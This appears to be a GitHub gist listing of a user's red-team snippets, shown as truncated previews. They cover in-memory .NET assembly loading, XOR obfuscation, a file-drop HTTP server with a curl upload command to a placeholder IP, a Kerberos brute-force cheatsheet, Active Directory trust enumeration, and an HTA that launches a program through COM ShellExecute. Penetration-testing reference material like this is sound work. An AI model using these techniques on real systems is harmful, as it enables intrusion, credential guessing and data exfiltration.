binarytrails

binarytrails / TestAssembly.cs
Created August 4, 2021 13:35 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
binarytrails / snippet.cs
Created August 4, 2021 14:16 — forked from silentbreaksec/snippet.cs
Convert C# EXE to Assembly
[DllImport("shell32.dll", SetLastError = true)]
static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);
public static string[] CommandLineToArgs(string commandLine)
{
int argc;
var argv = CommandLineToArgvW(commandLine, out argc);
if (argv == IntPtr.Zero)
throw new System.ComponentModel.Win32Exception();
try
binarytrails / xor.ps1
Created October 29, 2021 19:52 — forked from gabemarshall/xor.ps1
Simple Encrypt and Decrypt with Powershell
# Not secure by any means, just a PoC for XOR'ing data using powershell
# Credit to http://stackoverflow.com/questions/3478954/code-golf-xor-encryption
$enc = [System.Text.Encoding]::UTF8
function xor {
param($string, $method)
$xorkey = $enc.GetBytes("secretkey")
if ($method -eq "decrypt"){
binarytrails / http_server.py
Last active November 8, 2021 23:34
smol HTTP Server to drop files
#!/usr/bin/env python3
import http.server
import socketserver
import io
import cgi
# Change this to serve on a different port
PORT = 80
# curl -F "[email protected]" http://<ip>:80/file.txt
binarytrails / kerberos_attacks_cheatsheet.md
Created January 19, 2022 21:25 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

binarytrails / recon-ng_keys.md
Created February 14, 2022 20:03
Recon-ng Keys Setup

Instructions for Recon-NG v4.8.3:

API Keys:

  1. bing_api (optional $$$) - Sign up here (I chose the free plan), agree to all the terms until you get to "Thank You", then go here to view the key. (free account: 5000 transactions per month)

  2. builtwith_api - Go here and sign up. Once you enter an email and password, it will show you the API key.

  3. censysio_id - Go here and sign up. Once you register, confirm your account by clicking on the link in the email. Then log in and go here to view the "ID" and "Secret".

Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
binarytrails / python3_https_server.py
Created June 16, 2022 18:33 — forked from stephenbradshaw/python3_https_server.py
Python 3 Simple HTTPS server
#!/usr/bin/env python3
# python3 update of https://gist.github.com/dergachev/7028596
# Create a basic certificate using openssl:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Or to set CN, SAN and/or create a cert signed by your own root CA: https://thegreycorner.com/pentesting_stuff/writeups/selfsignedcert.html
import http.server
import ssl
httpd = http.server.HTTPServer(('127.0.0.1', 443), http.server.SimpleHTTPRequestHandler)
binarytrails / simple-gpg-enc.go
Created July 26, 2022 04:11 — forked from stuart-warren/simple-gpg-enc.go
golang gpg/openpgp encryption/decryption example
package main
import (
"bytes"
"golang.org/x/crypto/openpgp"
"encoding/base64"
"io/ioutil"
"log"
"os"
)
binarytrails / com.hta
Created January 25, 2023 20:16 — forked from OlivierLaflamme/com.hta
com.hta
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>